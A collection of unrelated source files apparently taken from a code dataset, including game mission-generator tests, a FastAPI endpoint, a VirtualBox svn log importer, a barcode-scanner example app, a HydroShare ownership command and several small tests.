    assert not _can_use_mission_type(con.SUPPLY, [con.ASSAULT])
    assert _can_use_mission_type(con.SPECIAL, [con.SPECIAL])
    assert _can_use_mission_type(con.GM_CHOICE, [con.GM_CHOICE])
    assert not _can_use_mission_type(con.SUPPLY, [])
    assert _can_use_mission_type(con.SUPPLY, [con.SUPPLY])
    assert _can_use_mission_type(con.SUPPLY, [con.ASSAULT, con.SUPPLY])
    assert _can_use_mission_type(con.SUPPLY, [con.SUPPLY, con.ASSAULT])
def test_make_one_mission():
    """A plain religious mission comes out with no notes/rewards/penalties."""
    mock = test.mock_data_gateway.MockDataGateway()
    mock.titles.append('bunker hill')
    setup_one_mission_base_build(mock, con.NOTHING, con.RELIGIOUS)
    missions =_generate_base_missions(mock, False, False, False, con.SUPPLY, con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT, con.RECON] )
    assert len(missions)==1
    mission = missions[0]
    check_mission(mission, con.RELIGIOUS, con.NOTHING, [], [], 0, con.required_religious_specialists, [])

def test_one_has_favor():
    """The ONE_HAS_FAVOR note adds a favor note using the next favor type."""
    mock = test.mock_data_gateway.MockDataGateway()
    mock.favor_types.append(con.THE_WILD)
    setup_one_mission_base_build(mock, con.ONE_HAS_FAVOR, con.SUPPLY)
    missions =_generate_base_missions( mock, False, False, False, con.ASSAULT, con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT, con.RECON] )
    assert len(missions)==1
    mission = missions[0]
    check_mission(mission,con.SUPPLY,con.NOTHING,[],[],1,con.required_supply_specialists,[con.FAVOR_NOTE[0:-3], con.THE_WILD])

def test_one_extra_specialist():
    """The PLUS_ONE_SPECIALIST note adds a specialist note and requirement."""
    mock = test.mock_data_gateway.MockDataGateway()
    mock.specialists.append(con.SNIPER)
    setup_one_mission_base_build(mock, con.PLUS_ONE_SPECIALIST, con.SUPPLY)
    missions =_generate_base_missions( mock, False, False, False, con.ASSAULT, con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT, con.RECON] )
    mission = missions[0]
    check_mission(mission, con.SUPPLY, con.NOTHING, [],[], 1, con.required_supply_specialists, ["Mission can include one additional specialist"])
    check_for_note_plus_one_specialist(mission, con.SNIPER)

def test_commanders_focus():
    """A COMMANDER_FOCUS mission resolves to the commander's chosen type."""
    mock = test.mock_data_gateway.MockDataGateway()
    setup_one_mission_base_build(mock, con.NOTHING, con.COMMANDER_FOCUS)
    missions =_generate_base_missions( mock, False, False, False, con.RECON, con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT, con.RECON] )
    mission = missions[0]
    check_mission(mission, con.RECON, con.NOTHING, [],[], 0,con.required_recon_specialists,[])

def test_gm_choice():
    """A GM_CHOICE mission resolves to the GM's chosen type."""
    mock = test.mock_data_gateway.MockDataGateway()
    setup_one_mission_base_build(mock, con.NOTHING, con.GM_CHOICE)
    missions =_generate_base_missions( mock, False, False, False, con.ASSAULT, con.RECON, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT, con.RECON] )
    mission = missions[0]
    check_mission(mission, con.RECON, con.NOTHING, [],[], 0,con.required_recon_specialists,[])
def test_unavailable_mission():
    """Unavailable types fall back to the next available type (or UNDEFINED
    when nothing is available)."""
    # test simple unavailability
    mock = test.mock_data_gateway.MockDataGateway()
    setup_one_mission_base_build(mock, con.NOTHING, con.RECON)
    missions =_generate_base_missions( mock, False, False, False, con.ASSAULT, con.RECON, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT] )
    mission = missions[0]
    check_mission(mission, con.RELIGIOUS, con.NOTHING, [],[], 0,con.required_religious_specialists,[])
    # test when mutiple missions unavailable
    setup_one_mission_base_build(mock, con.NOTHING, con.ASSAULT)
    missions =_generate_base_missions( mock, False, False, False, con.UNDEFINED, con.ASSAULT, [] )
    mission = missions[0]
    check_mission(mission, con.UNDEFINED, con.NOTHING, [],[], 0,con.NOTHING,[])

def test_special_missions_are_allowed():
    """SPECIAL missions are generated even with no available mission types."""
    # special
    mock = test.mock_data_gateway.MockDataGateway()
    setup_one_mission_base_build(mock, con.NOTHING, con.SPECIAL)
    missions =_generate_base_missions( mock, False, False, False, con.ASSAULT, con.ASSAULT, [] )
    mission = missions[0]
    check_mission(mission, con.SPECIAL, con.NOTHING, [],[], 0,con.NOTHING,[])

def create_mission_with_gm_choice_and_note(mock, choice, note, spymaster_buy=False):
    """Build one GM_CHOICE mission carrying *note* and return it."""
    setup_one_mission_base_build(mock, note, con.GM_CHOICE)
    missions =_generate_base_missions( mock, spymaster_buy, False, False, con.ASSAULT, choice, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT] )
    assert len(missions) == 1
    return missions[0]

def create_mission_with_commander_focus_and_note(mock, focus,note, spymaster_buy=False):
    """Build one COMMANDER_FOCUS mission carrying *note* and return it."""
    setup_one_mission_base_build(mock, note, con.COMMANDER_FOCUS)
    missions =_generate_base_missions( mock, spymaster_buy, False, False, focus, con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT] )
    assert len(missions) == 1
    return missions[0]
def test_commander_focus_plus_one_specialist():
    """COMMANDER_FOCUS + PLUS_ONE_SPECIALIST keeps the focus type and adds
    the extra-specialist note."""
    mock = test.mock_data_gateway.MockDataGateway()
    mock.specialists.append(con.HEAVY)
    focus=con.SUPPLY
    note=con.PLUS_ONE_SPECIALIST
    mission=create_mission_with_commander_focus_and_note(mock, focus, note)
    check_mission_type(mission, focus)
    check_note_len(mission, 1)
    check_for_note_plus_one_specialist(mission, con.HEAVY)

def test_commander_focus_one_has_favor():
    """COMMANDER_FOCUS + ONE_HAS_FAVOR keeps the focus type and adds the
    favor note."""
    mock = test.mock_data_gateway.MockDataGateway()
    mock.favor_types.append(con.HOLY)
    focus=con.SUPPLY
    note=con.ONE_HAS_FAVOR
    mission=create_mission_with_commander_focus_and_note(mock, focus, note)
    check_mission_type(mission, focus)
    check_note_len(mission, 1)
    check_for_note_favor(mission, con.HOLY)

def test_commander_focus_one_is_special():
    """COMMANDER_FOCUS + ONE_IS_SPECIAL overrides the focus with SPECIAL."""
    mock = test.mock_data_gateway.MockDataGateway()
    focus=con.SUPPLY
    note=con.ONE_IS_SPECIAL
    mission=create_mission_with_commander_focus_and_note(mock, focus, note)
    check_mission_type(mission, con.SPECIAL)
    check_note_len(mission, 0)

def test_gm_choice_plus_one_specialist():
    """GM_CHOICE + PLUS_ONE_SPECIALIST keeps the chosen type and adds the
    extra-specialist note."""
    mock = test.mock_data_gateway.MockDataGateway()
    mock.specialists.append(con.HEAVY)
    choice=con.SUPPLY
    note=con.PLUS_ONE_SPECIALIST
    mission=create_mission_with_gm_choice_and_note(mock, choice, note)
    check_mission_type(mission, choice)
    check_note_len(mission, 1)
    check_for_note_plus_one_specialist(mission, con.HEAVY)

def test_gm_choice_one_has_favor():
    """GM_CHOICE + ONE_HAS_FAVOR keeps the chosen type and adds the favor note."""
    mock = test.mock_data_gateway.MockDataGateway()
    mock.favor_types.append(con.HOLY)
    choice=con.SUPPLY
    note=con.ONE_HAS_FAVOR
    mission=create_mission_with_gm_choice_and_note(mock, choice, note)
    check_mission_type(mission, choice)
    check_note_len(mission, 1)
    check_for_note_favor(mission, con.HOLY)

def test_gm_choice_one_is_special():
    """GM_CHOICE + ONE_IS_SPECIAL overrides the chosen type with SPECIAL."""
    mock = test.mock_data_gateway.MockDataGateway()
    choice=con.SUPPLY
    note=con.ONE_IS_SPECIAL
    mission=create_mission_with_gm_choice_and_note(mock, choice, note)
    check_mission_type(mission, con.SPECIAL)
    check_note_len(mission, 0)
def test_simple_spymaster_spend():
    """A spymaster buy turns the generated mission into a SPECIAL mission."""
    mock=test.mock_data_gateway.MockDataGateway()
    setup_one_mission_base_build(mock, con.NOTHING, con.SUPPLY)
    missions =_generate_base_missions( mock, True, False, False, con.ASSAULT,con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT] )
    assert len(missions) == 1
    check_mission_type(missions[0], con.SPECIAL)

def test_one_mission_with_spymaster_and_one_is_special():
    """Spymaster buy plus ONE_IS_SPECIAL still yields one SPECIAL mission,
    with no leftover note."""
    mock=test.mock_data_gateway.MockDataGateway()
    setup_one_mission_base_build(mock, con.ONE_IS_SPECIAL, con.SUPPLY)
    missions =_generate_base_missions( mock, True, False, False, con.ASSAULT,con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT] )
    assert len(missions) == 1
    check_mission_type(missions[0], con.SPECIAL)
    check_note_len(missions[0],0)

def test_two_missions_with_spymaster_and_one_is_special():
    """With two missions, the spymaster buy and ONE_IS_SPECIAL make both
    missions SPECIAL."""
    mock=test.mock_data_gateway.MockDataGateway()
    mock.mission_counts.append((2, con.ONE_IS_SPECIAL))
    mock.mission_types.append(con.RECON)
    mock.mission_types.append(con.SUPPLY)
    missions =_generate_base_missions( mock, True, False, False, con.ASSAULT,con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT] )
    assert len(missions) == 2
    check_mission_type(missions[0], con.SPECIAL)
    check_note_len(missions[0],0)
    check_mission_type(missions[1], con.SPECIAL)
    check_note_len(missions[1],0)
def setup_three_missions(mock, note, first_type, second_type, third_type, commanders_focus, gms_choice, spymaster_buy=False):
    """Register three mission types on the mock, generate them with all four
    base types available, and return the resulting mission list."""
    mock.mission_counts.append((3, note))
    mock.mission_types.append(first_type)
    mock.mission_types.append(second_type)
    mock.mission_types.append(third_type)
    missions = _generate_base_missions(mock, spymaster_buy, False, False, commanders_focus, gms_choice, [con.ASSAULT, con.RECON, con.SUPPLY, con.RELIGIOUS])
    assert len(missions)==3
    return missions

def test_three_simple_missions():
    """Three missions with no note come out with their drawn types."""
    mock=test.mock_data_gateway.MockDataGateway()
    note=con.NOTHING
    first_type=con.RELIGIOUS
    second_type=con.SUPPLY
    third_type=con.RECON
    spymaster_buy=False
    commander_focus=con.ASSAULT
    gm_choice=con.ASSAULT
    missions=setup_three_missions(mock, note, first_type, second_type, third_type, commander_focus, gm_choice, spymaster_buy)
    check_mission_type(missions[0], con.RELIGIOUS)
    check_mission_type(missions[1], con.SUPPLY)
    check_mission_type(missions[2], con.RECON)

def test_three_missions_with_one_is_special():
    """With PLUS_ONE_SPECIALIST, the randomly picked mission (index 1 via the
    mocked random stream) gains the extra-specialist note."""
    mock=test.mock_data_gateway.MockDataGateway()
    mock.random_missions.append(1)
    mock.specialists.append(con.HEAVY)
    note=con.PLUS_ONE_SPECIALIST
    first_type=con.RELIGIOUS
    second_type=con.SUPPLY
    third_type=con.RECON
    spymaster_buy=False
    commander_focus=con.ASSAULT
    gm_choice=con.ASSAULT
    missions=setup_three_missions(mock, note, first_type, second_type, third_type, commander_focus, gm_choice, spymaster_buy)
    check_mission_type(missions[0], con.RELIGIOUS)
    check_mission_type(missions[1], con.SUPPLY)
    check_mission_type(missions[2], con.RECON)
    check_for_note_plus_one_specialist(missions[1],con.HEAVY)

def test_three_missions_with_spymaster_buy_and_one_is_special():
    """Spymaster buy plus ONE_IS_SPECIAL converts the first two of three
    missions to SPECIAL; the third keeps its drawn type."""
    mock=test.mock_data_gateway.MockDataGateway()
    note=con.ONE_IS_SPECIAL
    first_type=con.RELIGIOUS
    second_type=con.SUPPLY
    third_type=con.RECON
    spymaster_buy=True
    commander_focus=con.ASSAULT
    gm_choice=con.ASSAULT
    missions=setup_three_missions(mock, note, first_type, second_type, third_type, commander_focus, gm_choice, spymaster_buy)
    check_mission_type(missions[0], con.SPECIAL)
    check_mission_type(missions[1], con.SPECIAL)
    check_mission_type(missions[2], con.RELIGIOUS)
app/backend/app/api/api_v1/endpoints/category.py | matayoos/invoice-scrapper | 0 | 12762173 | from typing import Any, List
from app.schemas.category import CategoryResponse
from fastapi import APIRouter, Depends, status, HTTPException
from sqlalchemy.orm import Session
from app import crud, schemas
from app.api import deps
router = APIRouter()
@router.get(
    "/", response_model=List[schemas.CategoryResponse], status_code=status.HTTP_200_OK
)
def read_categories(
    db: Session = Depends(deps.get_db), skip: int = 0, limit: int = 100
) -> Any:
    """Return up to ``limit`` categories, skipping the first ``skip``."""
    categories = crud.read_categories(db, skip=skip, limit=limit)
    return categories
# Consistency fix: reference the response model through the ``schemas``
# namespace like the sibling endpoint above does.
@router.post("/", response_model=schemas.CategoryResponse, status_code=status.HTTP_200_OK)
def create_category(
    obj_in: schemas.CategoryCreate, db: Session = Depends(deps.get_db)
) -> Any:
    """Create a new category; reject duplicates by name with HTTP 400."""
    existing_category = crud.get_category_by_name(db, obj_in.name)
    if existing_category:
        raise HTTPException(status_code=400, detail="Category already registered")
    return crud.create_category(db, obj_in=obj_in)
| 2.46875 | 2 |
vbox/src/VBox/ValidationKit/testmanager/batch/vcs_import.py | Nurzamal/rest_api_docker | 0 | 12762174 | <reponame>Nurzamal/rest_api_docker<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# $Id: vcs_import.py 71157 2018-02-28 15:38:15Z vboxsync $
# pylint: disable=C0301
"""
Cron job for importing revision history for a repository.
"""
from __future__ import print_function;
__copyright__ = \
"""
Copyright (C) 2012-2017 Oracle Corporation
This file is part of VirtualBox Open Source Edition (OSE), as
available from http://www.virtualbox.org. This file is free software;
you can redistribute it and/or modify it under the terms of the GNU
General Public License (GPL) as published by the Free Software
Foundation, in version 2 as it comes in the "COPYING" file of the
VirtualBox OSE distribution. VirtualBox OSE is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
The contents of this file may alternatively be used under the terms
of the Common Development and Distribution License Version 1.0
(CDDL) only, as it comes in the "COPYING.CDDL" file of the
VirtualBox OSE distribution, in which case the provisions of the
CDDL are applicable instead of those of the GPL.
You may elect to license modified versions of this file under the
terms and conditions of either the GPL or the CDDL or both.
"""
__version__ = "$Revision: 71157 $"
# Standard python imports
import sys;
import os;
from optparse import OptionParser; # pylint: disable=deprecated-module
import xml.etree.ElementTree as ET;
# Add Test Manager's modules path
g_ksTestManagerDir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))));
sys.path.append(g_ksTestManagerDir);
# Test Manager imports
from testmanager.core.db import TMDatabaseConnection;
from testmanager.core.vcsrevisions import VcsRevisionData, VcsRevisionLogic;
from common import utils;
class VcsImport(object): # pylint: disable=R0903
    """
    Imports revision history from a VCS into the Test Manager database.
    """

    def __init__(self):
        """
        Parse command line.

        Exits with status 1 when --url or --repository is missing; only the
        'svn' VCS type is implemented.
        """
        oParser = OptionParser()
        oParser.add_option('-e', '--extra-option', dest = 'asExtraOptions', action = 'append',
                           help = 'Adds a extra option to the command retrieving the log.');
        oParser.add_option('-f', '--full', dest = 'fFull', action = 'store_true',
                           help = 'Full revision history import.');
        oParser.add_option('-q', '--quiet', dest = 'fQuiet', action = 'store_true',
                           help = 'Quiet execution');
        oParser.add_option('-R', '--repository', dest = 'sRepository', metavar = '<repository>',
                           help = 'Version control repository name.');
        oParser.add_option('-s', '--start-revision', dest = 'iStartRevision', metavar = 'start-revision',
                           type = "int", default = 0,
                           help = 'The revision to start at when doing a full import.');
        oParser.add_option('-t', '--type', dest = 'sType', metavar = '<type>',
                           help = 'The VCS type (default: svn)', choices = [ 'svn', ], default = 'svn');
        oParser.add_option('-u', '--url', dest = 'sUrl', metavar = '<url>',
                           help = 'The VCS URL');
        (self.oConfig, _) = oParser.parse_args();

        # Check command line
        asMissing = [];
        if self.oConfig.sUrl is None: asMissing.append('--url');
        if self.oConfig.sRepository is None: asMissing.append('--repository');
        if asMissing:
            sys.stderr.write('syntax error: Missing: %s\n' % (asMissing,));
            sys.exit(1);

        # Only svn is supported ('choices' above already restricts the input).
        assert self.oConfig.sType == 'svn';

    def main(self):
        """
        Main function: fetch the svn log as XML and store each entry in the
        Test Manager database.  Returns 0 on success (process exit code).
        """
        oDb = TMDatabaseConnection();
        oLogic = VcsRevisionLogic(oDb);

        # Where to start: incremental imports resume after the last stored
        # revision; full imports start at --start-revision.
        iStartRev = 0;
        if not self.oConfig.fFull:
            iStartRev = oLogic.getLastRevision(self.oConfig.sRepository);
        if iStartRev == 0:
            iStartRev = self.oConfig.iStartRevision;

        # Construct a command line.
        # Force a stable locale so svn's output encoding is predictable.
        os.environ['LC_ALL'] = 'en_US.utf-8';
        asArgs = [
            'svn',
            'log',
            '--xml',
            '--revision', str(iStartRev) + ':HEAD',
        ];
        if self.oConfig.asExtraOptions is not None:
            asArgs.extend(self.oConfig.asExtraOptions);
        asArgs.append(self.oConfig.sUrl);

        if not self.oConfig.fQuiet:
            print('Executing: %s' % (asArgs,));
        sLogXml = utils.processOutputChecked(asArgs);

        # Parse the XML and add the entries to the database.
        oParser = ET.XMLParser(target = ET.TreeBuilder(), encoding = 'utf-8');
        oParser.feed(sLogXml.encode('utf-8')); # does its own decoding and processOutputChecked always gives us decoded utf-8 now.
        oRoot = oParser.close();
        for oLogEntry in oRoot.findall('logentry'):
            iRevision = int(oLogEntry.get('revision'));
            sAuthor = oLogEntry.findtext('author').strip();
            sDate = oLogEntry.findtext('date').strip();
            sMessage = oLogEntry.findtext('msg', '').strip();
            if sMessage == '':
                # Presumably the DB column rejects empty strings — TODO confirm.
                sMessage = ' ';
            elif len(sMessage) > VcsRevisionData.kcchMax_sMessage:
                # Truncate to the column limit, reserving 4 chars for ' ...'.
                sMessage = sMessage[:VcsRevisionData.kcchMax_sMessage - 4] + ' ...';
            if not self.oConfig.fQuiet:
                utils.printOut(u'sDate=%s iRev=%u sAuthor=%s sMsg[%s]=%s'
                               % (sDate, iRevision, sAuthor, type(sMessage).__name__, sMessage));
            oData = VcsRevisionData().initFromValues(self.oConfig.sRepository, iRevision, sDate, sAuthor, sMessage);
            oLogic.addVcsRevision(oData);
        oDb.commit();
        oDb.close();

        return 0;
if __name__ == '__main__':
    # Script entry point: parse arguments, run the import, exit with its status.
    sys.exit(VcsImport().main());
| 1.726563 | 2 |
proglove_streams/app_example.py | workaroundgmbh/proglove_streams_api_reference | 0 | 12762175 | """Minimal example dumping whatever event it receives."""
import time
import logging
import argparse
from proglove_streams.logging import init_logging
from proglove_streams.client import Client
from proglove_streams.gateway import Gateway, GatewayMessageHandler
from proglove_streams.exception import ProgloveStreamsException
from proglove_streams.models.scan import ScanEvent
from proglove_streams.models.scanner_state import ScannerStateEvent
from proglove_streams.models.error import ErrorEvent
from proglove_streams.models.gateway_state import GatewayStateEvent
from proglove_streams.models.button_pressed import ButtonPressedEvent
logger = logging.getLogger(__name__)
def _set_display(client: Gateway, event: ScanEvent):
    """Show a three-field demo picking screen on the scanner that scanned."""
    content = [
        ("Storage Unit", "R15"),
        ("Item", "Engine 12"),
        ("Quantity", "10"),
    ]
    display_fields = [
        {
            "display_field_id": field_id,
            "display_field_header": header,
            "display_field_text": text,
        }
        for field_id, (header, text) in enumerate(content, start=1)
    ]
    client.set_display(str(event.device_serial), 'PG3',
                       display_fields=display_fields)
def _block_trigger(client: Gateway, event: ScanEvent):
    """Block single-click triggering on the sending scanner for 3000 ms."""
    serial = str(event.device_serial)
    client.set_trigger_block(serial, True, ["TRIGGER_SINGLE_CLICK"], [],
                             time_validity_duration=3000)
def _unblock_trigger(client: Gateway, event: ScanEvent):
    """Lift the trigger block on the sending scanner."""
    serial = str(event.device_serial)
    client.set_trigger_block(serial, False, [], [])
def on_connected(_client: Client, event: ScannerStateEvent) -> None:
    """Log the serial of a scanner that just connected."""
    serial = event.device_serial
    logger.info('device connected: %s', serial)
def on_disconnected(_client: Client, event: ScannerStateEvent) -> None:
    """Log the serial of a scanner that just disconnected."""
    serial = event.device_serial
    logger.info('device disconnected: %s', serial)
def on_scan(client: Client, event: ScanEvent) -> None:
    """Dispatch a demo action based on the scanned barcode content."""
    # Only a Gateway client can issue the demo commands below.
    if not isinstance(client, Gateway):
        return

    logger.info(
        'scan received: device %s, data: %s',
        event.device_serial,
        repr(event.scan_code)
    )

    # Keep only the part of the scan before any carriage return suffix.
    command = str(event.scan_code).split('\r')[0]
    if command == 'DISPLAY':
        _set_display(client, event)
    elif command == 'BLOCK':
        _block_trigger(client, event)
    elif command == 'UNBLOCK':
        _unblock_trigger(client, event)
    elif command in ('FEEDBACK_OK', 'FEEDBACK_NOK'):
        sequence = ('FEEDBACK_POSITIVE' if command == 'FEEDBACK_OK'
                    else 'FEEDBACK_NEGATIVE')
        client.send_feedback(str(event.device_serial), sequence)
    elif command == 'STATE':
        client.get_gateway_state()
def on_error(_client: Client, event: ErrorEvent) -> None:
    """Log the error code reported by the gateway."""
    code = event.error_code
    logger.info('error received: %s', code)
def on_gateway_state_event(_client: Client, event: GatewayStateEvent):
    """Log a summary of a Gateway state event (serial, version, devices)."""
    connected = ','.join(d.device_serial
                         for d in event.device_connected_list)
    logger.info('''Gateway state received: serial: %s version: %s
connected devices: %s''',
                event.gateway_serial,
                event.gateway_app_version,
                connected)
def on_button_pressed_event(_client: Client,
                            event: ButtonPressedEvent) -> None:
    """On button pressed event callback."""
    logger.info('button pressed: device %s, trigger gesture: %s',
                event.device_serial,
                event.trigger_gesture)
def app_example():
    """Example of Streams API usage.

    Parses the command line, connects to a Streams API gateway over the
    given serial port, registers the demo callbacks defined in this module,
    and then idles until interrupted with Ctrl-C.
    """
    parser = argparse.ArgumentParser('proglove_streams')
    parser.add_argument(
        '-L', '--logging-level',
        help='set the logging level (default is DEBUG)',
        type=str,
        metavar='LEVEL',
        choices=('DEBUG', 'INFO', 'WARNING', 'ERROR'),
        default='DEBUG'
    )
    parser.add_argument(
        '-b', '--baudrate',
        # Fixed typo in the original help text ("baudarate").
        help='use a specific baudrate (default is 115200)',
        type=int,
        metavar='VALUE',
        default=115200
    )
    parser.add_argument(
        'port',
        help='path to the serial device port (e.g. COM1, /dev/ttyACM0)',
        type=str,
        metavar='PORT',
    )

    args = parser.parse_args()

    device = args.port
    baudrate = args.baudrate

    init_logging(getattr(logging, args.logging_level))

    logger.info('Streams API example application.')

    # Wire up all the demo callbacks defined above.
    handler = GatewayMessageHandler(
        on_scanner_connected=on_connected,
        on_scanner_disconnected=on_disconnected,
        on_scan=on_scan,
        on_error=on_error,
        on_gateway_state_event=on_gateway_state_event,
        on_button_pressed=on_button_pressed_event
    )

    try:
        gateway = Gateway(handler, device, baudrate)
        gateway.start()
    except ProgloveStreamsException as e:
        # Use the module logger for consistency (the original called the
        # root logger via logging.error here).
        logger.error('Streams API exception: %s', e)
        return

    logger.info('application started, press Ctrl-C to exit')

    # Idle until the user interrupts; the gateway handles events meanwhile.
    try:
        while True:
            time.sleep(1000)
    except KeyboardInterrupt:
        gateway.stop()
| 2.328125 | 2 |
hs_core/management/commands/add_owner.py | hydroshare/hydroshare | 178 | 12762176 | """ Add an owner to a resource or resources
Usage: add_owner {username} {resource list}
"""
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from hs_core.models import BaseResource
from hs_core.hydroshare.utils import get_resource_by_shortkey
from hs_access_control.models.privilege import UserResourcePrivilege, PrivilegeCodes
from django_irods.icommands import SessionException
from django.db import transaction
def set_quota_holder(resource, user):
    """Make *user* the quota holder of *resource*, tolerating backend glitches.

    Failures are reported on stdout rather than raised so that batch runs can
    continue past resources with broken iRODS state.
    """
    try:
        resource.set_quota_holder(user, user)
    except SessionException as ex:
        # some resources copied from www for testing do not exist in the iRODS backend,
        # hence need to skip these test artifacts
        print(resource.short_id + ' raised SessionException when setting quota holder: ' +
              ex.stderr)
    except AttributeError as ex:
        # when federation is not set up correctly, istorage does not have a session
        # attribute, hence raise AttributeError - ignore for testing
        print((resource.short_id + ' raised AttributeError when setting quota holder: ' +
               str(ex)))
    except ValueError as ex:
        # similar misconfiguration can also surface as ValueError - ignore for
        # testing (the original comment here was a copy of the AttributeError one)
        print((resource.short_id + ' raised ValueError when setting quota holder: ' +
               str(ex)))
class Command(BaseCommand):
    """Management command that grants ownership of resources to a user."""
    help = "add owner to resource"

    def add_arguments(self, parser):
        """Declare the command line arguments accepted by this command."""
        # The user who should become an (additional) owner.
        parser.add_argument('new_owner', type=str)
        parser.add_argument(
            '--owned_by',
            dest='owned_by',
            help='prior owner of the resources'
        )
        parser.add_argument(
            '--set_quota_holder',
            action='store_true',  # True for presence, False for absence
            dest='set_quota_holder',  # value is options['set_quota_holder']
            help='set quota holder as new owner')

        # a list of resource id's: none does nothing.
        parser.add_argument('resource_ids', nargs='*', type=str)

    def handle(self, *args, **options):
        """Grant ownership per --owned_by and/or per explicit resource ids.

        Each share (plus optional quota-holder change) runs in its own
        transaction, so one failing resource does not roll back the others.
        """
        user = User.objects.get(username=options['new_owner'])
        # Privileges are granted in the name of the admin account.
        admin = User.objects.get(username='admin')
        if options['owned_by'] is not None:
            prior = User.objects.get(username=options['owned_by'])
            # Every resource currently owned by the prior owner also gets
            # the new owner (the prior owner keeps ownership).
            for res in BaseResource.objects.filter(r2urp__user=prior,
                                                   r2urp__privilege=PrivilegeCodes.OWNER):
                with transaction.atomic():
                    resource = res.get_content_model()
                    UserResourcePrivilege.share(user=user,
                                                resource=resource,
                                                privilege=PrivilegeCodes.OWNER,
                                                grantor=admin)
                    print("added owner {} to {}".format(options['new_owner'], resource.short_id))
                    if options['set_quota_holder']:
                        set_quota_holder(resource, user)
                        print("set quota holder to {} for {}".format(options['new_owner'],
                                                                     resource.short_id))

        if len(options['resource_ids']) > 0:  # an array of resource short_id to check.
            for rid in options['resource_ids']:
                resource = get_resource_by_shortkey(rid, or_404=False)
                with transaction.atomic():
                    UserResourcePrivilege.share(user=user,
                                                resource=resource,
                                                privilege=PrivilegeCodes.OWNER,
                                                grantor=admin)
                    print("added owner {} to {}".format(options['new_owner'], rid))
                    if options['set_quota_holder']:
                        set_quota_holder(resource, user)
                        print("set quota holder to {} for {}".format(options['new_owner'],
                                                                     resource.short_id))
| 2.359375 | 2 |
baekjoon/11866.py | GihwanKim/Baekjoon | 0 | 12762177 | <gh_stars>0
"""
11866 : 조세퍼스 문제 0
URL : https://www.acmicpc.net/problem/11866
Input :
7 3
Output :
<3, 6, 2, 7, 5, 1, 4>
"""
# Read the circle size N and the step size M (e.g. "7 3").  split() without
# an argument also tolerates repeated whitespace.
N, M = map(int, input().split())

i = 0
josephus = []
sequence = list(range(1, N + 1))

# Step M-1 positions around the shrinking circle and remove the person at
# that index; the removal order is the Josephus permutation.  pop(i) removes
# by index directly, where the original remove(sequence[i]) first re-scanned
# the list for the value (a redundant O(n) search per removal).
while sequence:
    i = (i + M - 1) % len(sequence)
    josephus.append(sequence.pop(i))

print("<{}>".format(', '.join(str(c) for c in josephus)))
| 3.1875 | 3 |
util/config/validators/test/test_validate_database.py | anwarchk/quay | 1 | 12762178 | <filename>util/config/validators/test/test_validate_database.py
import pytest
from util.config.validator import ValidatorContext
from util.config.validators import ConfigValidationException
from util.config.validators.validate_database import DatabaseValidator
from test.fixtures import *
@pytest.mark.parametrize('unvalidated_config,user,user_password,expected', [
    (ValidatorContext(None), None, None, TypeError),
    (ValidatorContext({}), None, None, KeyError),
    (ValidatorContext({'DB_URI': 'sqlite:///:memory:'}), None, None, None),
    (ValidatorContext({'DB_URI': 'invalid:///:memory:'}), None, None, KeyError),
    (ValidatorContext({'DB_NOTURI': 'sqlite:///:memory:'}), None, None, KeyError),
])
def test_validate_database(unvalidated_config, user, user_password, expected, app):
    """A well-formed DB_URI validates; bad or missing config raises."""
    validator = DatabaseValidator()
    if expected is None:
        validator.validate(unvalidated_config)
    else:
        with pytest.raises(expected):
            validator.validate(unvalidated_config)
| 2.546875 | 3 |
services/backend/tests/test_main.py | gideonmandu/note_taking_app | 0 | 12762179 | <gh_stars>0
from tests.confest import test_app
def test_home(test_app):
    """The root endpoint returns HTTP 200 with the hello-world payload."""
    res = test_app.get('/')
    assert res.status_code == 200
    assert res.json() == {"message": "hello, world!"}
| 2.15625 | 2 |
tests/schema/data/__init__.py | datapio/klander | 2 | 12762180 | <reponame>datapio/klander<gh_stars>1-10
from .state_reconciler import *
from .response import *
| 1.0625 | 1 |
tests/test_primitive_data/test_real.py | amih90/bacpypes | 240 | 12762181 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Test Primitive Data Real
------------------------
"""
import unittest
import struct
import math
from bacpypes.debugging import bacpypes_debugging, ModuleLogger, xtob
from bacpypes.errors import InvalidTag
from bacpypes.primitivedata import Real, Tag
# some debugging
_debug = 0
_log = ModuleLogger(globals())
@bacpypes_debugging
def real_tag(x):
    """Build a Real application tag from a hex-encoded payload string."""
    if _debug: real_tag._debug("real_tag %r", x)

    payload = xtob(x)
    result = Tag(Tag.applicationTagClass, Tag.realAppTag, len(payload), payload)
    if _debug: real_tag._debug(" - tag: %r", result)

    return result
@bacpypes_debugging
def real_encode(obj):
    """Encode a Real object and return the resulting tag."""
    if _debug: real_encode._debug("real_encode %r", obj)

    result = Tag()
    obj.encode(result)
    if _debug: real_encode._debug(" - tag: %r, %r", result, result.tagData)

    return result
@bacpypes_debugging
def real_decode(tag):
    """Decode a real application tag back into a Real object."""
    if _debug: real_decode._debug("real_decode %r", tag)

    decoded = Real(tag)
    if _debug: real_decode._debug(" - obj: %r, %r", decoded, decoded.value)

    return decoded
@bacpypes_debugging
def real_endec(v, x):
    """Pass the value to Real, construct a tag from the hex string,
    and compare results of encode and decoding each other."""
    if _debug: real_endec._debug("real_endec %r %r", v, x)

    tag = real_tag(x)
    if _debug: real_endec._debug(" - tag: %r, %r", tag, tag.tagData)

    obj = Real(v)
    if _debug: real_endec._debug(" - obj: %r, %r", obj, obj.value)

    assert real_encode(obj) == tag
    if _debug: real_endec._debug(" - tags match")

    # NaN never compares equal to itself, so the decoded value has to be
    # checked with math.isnan() instead of ==.
    if math.isnan(v):
        assert math.isnan(real_decode(tag).value)
        if _debug: real_endec._debug(" - both NaN")
    else:
        assert real_decode(tag) == obj
